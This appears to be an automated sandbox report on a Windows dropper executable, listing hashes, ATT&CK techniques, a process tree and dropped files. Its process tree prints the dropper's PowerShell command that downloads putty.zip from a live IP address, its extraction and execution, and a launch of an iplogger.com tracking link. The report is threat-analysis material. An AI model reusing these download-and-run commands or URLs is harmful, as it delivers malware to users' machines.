713a497c8da97c2082758fd31147539f408a72b62041c6c9ed77037021621e94

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
31/05/2024, 19:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

66a5a529386533e25316942993772042.exe
Size

5.9MB
MD5

66a5a529386533e25316942993772042
SHA1

053d0d7f4cb6e3952e849f02bbfbdb4d39021146
SHA256

713a497c8da97c2082758fd31147539f408a72b62041c6c9ed77037021621e94
SHA512

9f4f69e9d1a3265311cd9f4bb9a254f157e1e0b7536466e88449f410f297d501d10448b170901206fff0ffde6d7e8a50b84e391fd62ff0f9355b506959cc336a
SSDEEP

98304:6QqmVoQ/tUAh8ggYJCHtEFy3X1mDyV/w4qp/tkC9+yZ+KZ8dSHLNejiRuO+4GiW:6QqmVo481z1mYbWSCeKhxqr7h

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://94.103.188.126/jerry/putty.zip

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
8	1148	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2252	putty.exe

Loads dropped DLL 2 IoCs

pid	Process
2404	66a5a529386533e25316942993772042.exe
2404	66a5a529386533e25316942993772042.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
20	iplogger.com
23	iplogger.com

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1148	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
1148	powershell.exe
1148	powershell.exe
1340	msedge.exe
1340	msedge.exe
492	msedge.exe
492	msedge.exe
2056	identity_helper.exe
2056	identity_helper.exe
5752	msedge.exe
5752	msedge.exe
5752	msedge.exe
5752	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1148	powershell.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe
492	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2404 wrote to memory of 3096	2404	66a5a529386533e25316942993772042.exe	83
PID 2404 wrote to memory of 3096	2404	66a5a529386533e25316942993772042.exe	83
PID 2404 wrote to memory of 3096	2404	66a5a529386533e25316942993772042.exe	83
PID 3096 wrote to memory of 1148	3096	cmd.exe	85
PID 3096 wrote to memory of 1148	3096	cmd.exe	85
PID 3096 wrote to memory of 1148	3096	cmd.exe	85
PID 3096 wrote to memory of 492	3096	cmd.exe	89
PID 3096 wrote to memory of 492	3096	cmd.exe	89
PID 3096 wrote to memory of 4568	3096	cmd.exe	91
PID 3096 wrote to memory of 4568	3096	cmd.exe	91
PID 3096 wrote to memory of 4568	3096	cmd.exe	91
PID 492 wrote to memory of 5116	492	msedge.exe	92
PID 492 wrote to memory of 5116	492	msedge.exe	92
PID 3096 wrote to memory of 2252	3096	cmd.exe	93
PID 3096 wrote to memory of 2252	3096	cmd.exe	93
PID 492 wrote to memory of 1244	492	msedge.exe	95
PID 492 wrote to memory of 1244	492	msedge.exe	95
PID 492 wrote to memory of 1244	492	msedge.exe	95
PID 492 wrote to memory of 1244	492	msedge.exe	95
PID 492 wrote to memory of 1244	492	msedge.exe	95
PID 492 wrote to memory of 1244	492	msedge.exe	95
PID 492 wrote to memory of 1244	492	msedge.exe	95
PID 492 wrote to memory of 1244	492	msedge.exe	95
PID 492 wrote to memory of 1244	492	msedge.exe	95
PID 492 wrote to memory of 1244	492	msedge.exe	95
PID 492 wrote to memory of 1244	492	msedge.exe	95
PID 492 wrote to memory of 1244	492	msedge.exe	95
PID 492 wrote to memory of 1244	492	msedge.exe	95
PID 492 wrote to memory of 1244	492	msedge.exe	95
PID 492 wrote to memory of 1244	492	msedge.exe	95
PID 492 wrote to memory of 1244	492	msedge.exe	95
PID 492 wrote to memory of 1244	492	msedge.exe	95
PID 492 wrote to memory of 1244	492	msedge.exe	95
PID 492 wrote to memory of 1244	492	msedge.exe	95
PID 492 wrote to memory of 1244	492	msedge.exe	95
PID 492 wrote to memory of 1244	492	msedge.exe	95
PID 492 wrote to memory of 1244	492	msedge.exe	95
PID 492 wrote to memory of 1244	492	msedge.exe	95
PID 492 wrote to memory of 1244	492	msedge.exe	95
PID 492 wrote to memory of 1244	492	msedge.exe	95
PID 492 wrote to memory of 1244	492	msedge.exe	95
PID 492 wrote to memory of 1244	492	msedge.exe	95
PID 492 wrote to memory of 1244	492	msedge.exe	95
PID 492 wrote to memory of 1244	492	msedge.exe	95
PID 492 wrote to memory of 1244	492	msedge.exe	95
PID 492 wrote to memory of 1244	492	msedge.exe	95
PID 492 wrote to memory of 1244	492	msedge.exe	95
PID 492 wrote to memory of 1244	492	msedge.exe	95
PID 492 wrote to memory of 1244	492	msedge.exe	95
PID 492 wrote to memory of 1244	492	msedge.exe	95
PID 492 wrote to memory of 1244	492	msedge.exe	95
PID 492 wrote to memory of 1244	492	msedge.exe	95
PID 492 wrote to memory of 1244	492	msedge.exe	95
PID 492 wrote to memory of 1244	492	msedge.exe	95
PID 492 wrote to memory of 1244	492	msedge.exe	95
PID 492 wrote to memory of 1340	492	msedge.exe	96
PID 492 wrote to memory of 1340	492	msedge.exe	96
PID 492 wrote to memory of 916	492	msedge.exe	97
PID 492 wrote to memory of 916	492	msedge.exe	97
PID 492 wrote to memory of 916	492	msedge.exe	97
PID 492 wrote to memory of 916	492	msedge.exe	97
PID 492 wrote to memory of 916	492	msedge.exe	97
PID 492 wrote to memory of 916	492	msedge.exe	97
PID 492 wrote to memory of 916	492	msedge.exe	97

C:\Users\Admin\AppData\Local\Temp\66a5a529386533e25316942993772042.exe
"C:\Users\Admin\AppData\Local\Temp\66a5a529386533e25316942993772042.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2404
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C cd "C:\Users\Admin\AppData\Local\Temp\putty" & "Smartscreen.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3096
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('http://94.103.188.126/jerry/putty.zip', 'C:\Users\Admin\AppData\Local\Temp\putty.zip')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1148
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.com/26uSj6
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:492
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffb9f846f8,0x7fffb9f84708,0x7fffb9f84718
      4⤵
      PID:5116
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,8477008191035182574,15858332103216838173,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2
      4⤵
      PID:1244
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,8477008191035182574,15858332103216838173,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2504 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1340
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2152,8477008191035182574,15858332103216838173,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2932 /prefetch:8
      4⤵
      PID:916
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,8477008191035182574,15858332103216838173,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
      4⤵
      PID:844
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,8477008191035182574,15858332103216838173,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
      4⤵
      PID:1668
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,8477008191035182574,15858332103216838173,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5020 /prefetch:1
      4⤵
      PID:4048
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,8477008191035182574,15858332103216838173,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5432 /prefetch:1
      4⤵
      PID:2280
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,8477008191035182574,15858332103216838173,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:1
      4⤵
      PID:4384
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,8477008191035182574,15858332103216838173,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5848 /prefetch:8
      4⤵
      PID:4852
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,8477008191035182574,15858332103216838173,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5848 /prefetch:8
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2056
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,8477008191035182574,15858332103216838173,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5032 /prefetch:1
      4⤵
      PID:2796
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,8477008191035182574,15858332103216838173,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5144 /prefetch:1
      4⤵
      PID:1544
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,8477008191035182574,15858332103216838173,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1740 /prefetch:2
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5752
- - C:\Windows\SysWOW64\tar.exe
    tar -xf putty.zip
    3⤵
    PID:4568
- - C:\Users\Admin\AppData\Local\Temp\putty\putty.exe
    C:\Users\Admin\AppData\Local\Temp\putty\putty.exe
    3⤵
    - Executes dropped EXE
    PID:2252

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2492

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3184

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
439b5e04ca18c7fb02cf406e6eb24167

SHA1
e0c5bb6216903934726e3570b7d63295b9d28987

SHA256
247d0658695a1eb44924a32363906e37e9864ba742fe35362a71f3a520ad2654

SHA512
d0241e397060eebd4535197de4f1ae925aa88ae413a3a9ded6e856b356c4324dfd45dddfef9a536f04e4a258e8fe5dc1586d92d1d56b649f75ded8eddeb1f3e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
a8e767fd33edd97d306efb6905f93252

SHA1
a6f80ace2b57599f64b0ae3c7381f34e9456f9d3

SHA256
c8077a9fc79e2691ef321d556c4ce9933ca0570f2bbaa32fa32999dfd5f908bb

SHA512
07b748582fe222795bce74919aa06e9a09025c14493edb6f3b1f112d9a97ac2225fe0904cac9adf2a62c98c42f7877076e409803014f0afd395f4cc8be207241

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\7887b3c3-c153-442a-bccf-e84c76793bfd.tmp

Filesize
5KB

MD5
d5fdad13218a6ae804fa326864a35488

SHA1
78c8333c15a95a060481bf7cd7fb66abc8363171

SHA256
3d3eeb1f3520212e15d8fdc9785a817ddb13a283388aefc106b4c99342fff88f

SHA512
d9efc1c3be15485905ee0453054ef28c3a32e39cad512e3dcbd19e82de56118d3a86f1fb84f9717ad062f58047065b7a71ae1d358b15b4a883c7a18505bc324b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
336B

MD5
21ea7b3b5ebb30cfcff88ac9543e22ab

SHA1
875fc37d5bef32f81da79574cb9452a73586034e

SHA256
8c921851bc6c7e39036e97920080a2200539d3e83d2faf3fe8c760c24c982ea1

SHA512
4978fac4f00bbf4bfe5e33c3c3c2dd046d90b2c7ace616e4dba4a04370923132ea0b4e6fbb6e0a5bbb3cc274e62194d2487a18f5ece2aaea33a3ad16be160f33

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
1KB

MD5
d1f1b74d012c23fc5a900215d6791058

SHA1
2fd0b466e879d255d9e80b4c6de00850649aec06

SHA256
fb64751492838a920efdf1e531625974a8a26a58f96c686d933b2708ceb2360c

SHA512
2242da75612ab3a20ced34d1c5c47d31bb215e6e859f654b98f08a9f0e3bb5866c53da2aad7d7a8e42bc61bdbcda3688e86f8d5259a383f0bec2fbe12892accd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
1KB

MD5
2d19c8bfd66785291d3925b8be93abc5

SHA1
3dc684c4f42dfec194c98ec58c80b319477185d5

SHA256
ea2ae5301bfd4e74e7acf953a0293fd35909982b2cfd5a15924d1ed7ce049693

SHA512
0c0aa2151151877e8a36f30abb58d6d98f34314b26cde52174555e18bdf3809baa24cdaf77444a7b1ad738416215a6aee428b26b5d7c68b9e6ffa81a4ed447dc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
18124fbf0679e4006b6e5dfbc4f96e2c

SHA1
693a6b6a8e090ce281b9c661bf76d37c75913b2b

SHA256
4ea5634f2a1e96cd9aa4ffff07e50893b76ce44d31b7c1d07222f36853773375

SHA512
0938b0267abbabf457a29caecabde71397bc0f9e1c247f051a53e1e3cdcea55973f3a4291129f8def15b0ec1a36e448b60907eb6bba42da283f44105417ddc34

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
bee0894c48a00681182c62c9872fcf55

SHA1
9a973b9805e83f0a5faeb7592dbd9fe0682def6c

SHA256
4113fcbc022b91484eb60e6ca6e8dc21c005dfec8f94f65b0ec58845de90c85c

SHA512
f60ced7097dda01224b7bc1b3eace86ef473faaa0810e353738f5fb62ea1c1f0e9291c69ae366b475735583e0ea7714ede4c65bdb8ffab893651c02b30b4ed10

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_etsapzwu.emc.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsr571A.tmp\UAC.dll

Filesize
14KB

MD5
adb29e6b186daa765dc750128649b63d

SHA1
160cbdc4cb0ac2c142d361df138c537aa7e708c9

SHA256
2f7f8fc05dc4fd0d5cda501b47e4433357e887bbfed7292c028d99c73b52dc08

SHA512
b28adcccf0c33660fecd6f95f28f11f793dc9988582187617b4c113fb4e6fdad4cf7694cd8c0300a477e63536456894d119741a940dda09b7df3ff0087a7eada

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsr571A.tmp\nsExec.dll

Filesize
6KB

MD5
132e6153717a7f9710dcea4536f364cd

SHA1
e39bc82c7602e6dd0797115c2bd12e872a5fb2ab

SHA256
d29afce2588d8dd7bb94c00ca91cac0e85b80ffa6b221f5ffcb83a2497228eb2

SHA512
9aeb0b3051ce07fb9f03dfee7cea4a5e423425e48cb538173bd2a167817f867a30bd4d27d07875f27ca00031745b24547030b7f146660b049fa717590f1c77e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\putty.zip

Filesize
933KB

MD5
188fbf5c7b5748e1f750be2bab44e0a0

SHA1
525afccfc532830f71f068acfbf9ac49a1463539

SHA256
14a23a25c21deba6f3a85d2e24085a95881302499bcdde6dc9a585fe46b9f370

SHA512
62d6232ec09e266585f29c9fe335a6f02cfc0dbd8aa02545b0648eec7424aa25c4138cff49015073aede2a45506c056cbaa592cfc5d3a537313d9ee5bf1c6608

Download Submit
C:\Users\Admin\AppData\Local\Temp\putty\Smartscreen.bat

Filesize
238B

MD5
f6423b02fa9b2de5b162826b26c0dc56

SHA1
01e7e79e6018c629ca11bc30f15a1a3e6988773e

SHA256
59f52a56309ecb5c9c256a88db12a60403e5b0a8c0b8c013e7f6c9c5c395ff83

SHA512
5974e3a1bfe84719a2af614995f821d1c0a751b2ef2b39a3f6087c31dec609eb57d0824a28304e68365b75a0c7a3978aa28ed26c8f392976bd3337c1e8561459

Download Submit
C:\Users\Admin\AppData\Local\Temp\putty\putty.exe

Filesize
1.6MB

MD5
7a9a33206f80078ba80f7a839cd92451

SHA1
55447378c48561c35bad1317b58a34ee50c5072f

SHA256
e53c379d95e95706c5a2c4d6cd609857368a3bf14f28d7e67f6e3f8dfce6d486

SHA512
61873ed9b7616de998eff2ca90c6698cb0df87d181344fc6e02fd70fcd87fd8028cfdb7f606a3637514463982c161549729145118190e42b7f47365716f23aba

Download Submit
memory/1148-19-0x0000000074410000-0x0000000074BC0000-memory.dmp

Filesize
7.7MB

Download
memory/1148-39-0x0000000074410000-0x0000000074BC0000-memory.dmp

Filesize
7.7MB

Download
memory/1148-35-0x0000000006BB0000-0x0000000006BCA000-memory.dmp

Filesize
104KB

Download
memory/1148-34-0x0000000007D30000-0x00000000083AA000-memory.dmp

Filesize
6.5MB

Download
memory/1148-33-0x00000000066F0000-0x000000000673C000-memory.dmp

Filesize
304KB

Download
memory/1148-32-0x00000000066A0000-0x00000000066BE000-memory.dmp

Filesize
120KB

Download
memory/1148-31-0x00000000060E0000-0x0000000006434000-memory.dmp

Filesize
3.3MB

Download
memory/1148-21-0x0000000006070000-0x00000000060D6000-memory.dmp

Filesize
408KB

Download
memory/1148-20-0x0000000006000000-0x0000000006066000-memory.dmp

Filesize
408KB

Download
memory/1148-18-0x00000000056E0000-0x0000000005702000-memory.dmp

Filesize
136KB

Download
memory/1148-16-0x0000000074410000-0x0000000074BC0000-memory.dmp

Filesize
7.7MB

Download
memory/1148-17-0x0000000005860000-0x0000000005E88000-memory.dmp

Filesize
6.2MB

Download
memory/1148-15-0x0000000002DB0000-0x0000000002DE6000-memory.dmp

Filesize
216KB

Download
memory/1148-14-0x000000007441E000-0x000000007441F000-memory.dmp

Filesize
4KB

Download